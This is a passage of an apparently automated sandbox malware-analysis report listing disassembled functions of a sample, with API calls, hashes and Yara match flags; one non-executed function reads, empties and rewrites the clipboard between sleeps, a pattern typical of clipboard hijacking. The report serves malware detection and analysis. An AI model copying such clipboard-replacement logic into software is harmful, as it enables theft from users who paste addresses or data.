                                                                                  • API String ID: 3358372957-2681926500
                                                                                  • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                  • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                                                  • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                  • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                                                  Function 04830E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,04830223,?,?), ref: 04830E19
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,04830223,?,?), ref: 04830E1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction ID: fac51719a0f8eb966acdf495e1c2fbd6ad291f7a6da94e53058e51221776b9e5
                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction Fuzzy Hash: 14D0123164512877D7003A94DC09BCD7B1CDF05B63F008411FB0DD9080C770954046E5
                                                                                  Function 004341A6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                  • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                  • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                                                  Function 004036C4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2638373210-0
                                                                                  • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                  • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                                                  • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                  • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                                                  Function 00402843 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                  • String ID:
                                                                                  • API String ID: 323602529-0
                                                                                  • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                  • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                                                  • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                  • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                                                  Function 00403CE7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID:
                                                                                  • API String ID: 3886170330-0
                                                                                  • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                  • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                                                  • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                  • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                                                  Function 004327A5 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wsopen_s
                                                                                  • String ID:
                                                                                  • API String ID: 3347428461-0
                                                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                  • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                  • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                                                  Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                  • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                                                  • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                  • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                                                  Function 0040FB31 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 2005118841-0
                                                                                  • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                  • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                                                  • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                  • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                                                  Function 0043CD2A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                  • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                  • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                  • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                  Function 02DAA365 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02DAA3B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2da9000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: 8cfac28e9fb4e9a4d8da3c9433555d9e30110192ca4f14243944f3df2b75e9da
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: 51111979A00208EFDB01DF98C985E98BBF5AB08751F098094F9489B361D371EA90DF90

                                                                                  Non-executed Functions

                                                                                  Function 04831947 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 04831951
                                                                                  • Sleep.KERNEL32(000011EB), ref: 0483195B
                                                                                    • Part of subcall function 0483CE9C: _strlen.LIBCMT ref: 0483CEB3
                                                                                  • OpenClipboard.USER32(00000000), ref: 04831988
                                                                                  • GetClipboardData.USER32(00000001), ref: 04831998
                                                                                  • _strlen.LIBCMT ref: 048319B4
                                                                                  • _strlen.LIBCMT ref: 048319E3
                                                                                  • _strlen.LIBCMT ref: 04831B27
                                                                                  • EmptyClipboard.USER32 ref: 04831B3D
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 04831B4A
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 04831B74
                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 04831B7D
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 04831B84
                                                                                  • CloseClipboard.USER32 ref: 04831BA8
                                                                                  • Sleep.KERNEL32(000002C7), ref: 04831BB3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                  • String ID: 4#E$i
                                                                                  • API String ID: 4246938166-2480119546
                                                                                  • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                  • Instruction ID: d772c66402122ee70e18c0c19f9da58889a2d054d8ccc519cd7140c438303841
                                                                                  • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                  • Instruction Fuzzy Hash: B0510431D00384DAE311DFA8ED49BAD7764FF2A707F045768D801E6162EBB0A685C79A
                                                                                  Function 0483237D Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 048323B8
                                                                                  • GetClientRect.USER32(?,?), ref: 048323CD
                                                                                  • GetDC.USER32(?), ref: 048323D4
                                                                                  • CreateSolidBrush.GDI32(00646464), ref: 048323E7
                                                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 04832406
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 04832427
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 04832432
                                                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 0483243B
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 0483245F
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 048324EA
                                                                                  • _wcslen.LIBCMT ref: 04832502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1529870607-0
                                                                                  • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                  • Instruction ID: cc3af0029675f4fa7adc0898baadd805a78eda4c212d08b4dc9ec518dc766817
                                                                                  • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                  • Instruction Fuzzy Hash: 98710D72900218AFDB229F68DD85FAEB7BCEB09711F4042E5F609E6151DA74AF80CF54
                                                                                  Function 0043B78E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                                                  • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                                                  Function 0486B9F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0486BD14,?,00000000), ref: 0486BA8E
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0486BD14,?,00000000), ref: 0486BAB7
                                                                                  • GetACP.KERNEL32(?,?,0486BD14,?,00000000), ref: 0486BACC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction ID: c0da5dfa8596b23760c83382c91a831080be5648eae8d8968c1167c0989455ab
                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction Fuzzy Hash: F621A426706124AAD7B08F54D901A9773A6EF40F6EB568A74E90BD7110FB32FDC0C350
                                                                                  Function 0043B962 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                  • String ID:
                                                                                  • API String ID: 2287132625-0
                                                                                  • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                  • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                                                  • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                  • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                                                  Function 0486BBC9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 048621C0
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0486BCD5
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0486BD30
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0486BD3F
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,04860A3C,00000040,?,04860B5C,00000055,00000000,?,?,00000055,00000000), ref: 0486BD87
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,04860ABC,00000040), ref: 0486BDA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                  • String ID:
                                                                                  • API String ID: 2287132625-0
                                                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                  • Instruction ID: 014ca01423c437a50e477c93ce54f5d08faa44c33b95633d6140c2abdc7c28ae
                                                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                  • Instruction Fuzzy Hash: 73519571A00229DBEB50DFA9DC45ABE77B8BF04708F044A65E912E7150EBB1BB04CB51
                                                                                  Function 0043B02A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                  • String ID:
                                                                                  • API String ID: 2444527052-0
                                                                                  • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                  • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                                                  • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                  • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                                                  Function 0486B291 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04860A43,?,?,?,?,0486049A,?,00000004), ref: 0486B373
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0486B403
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0486B411
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04860A43,00000000,04860B63), ref: 0486B4B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                  • String ID:
                                                                                  • API String ID: 2444527052-0
                                                                                  • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                  • Instruction ID: f685e734ae32d5366a97d96cfaa1cb65e815af93f21f6bb7e6241936355885d6
                                                                                  • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                  • Instruction Fuzzy Hash: B361F871600216AAE764AF79DC41BBB73ACEF04718F144A79EE07D7180EAB4F541C7A2
                                                                                  Function 004351E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: 11@$GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-1075713910
                                                                                  • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                  • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                                                  • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                  • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                                                  Function 0043B415 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorInfoLastLocale$_free
                                                                                  • String ID:
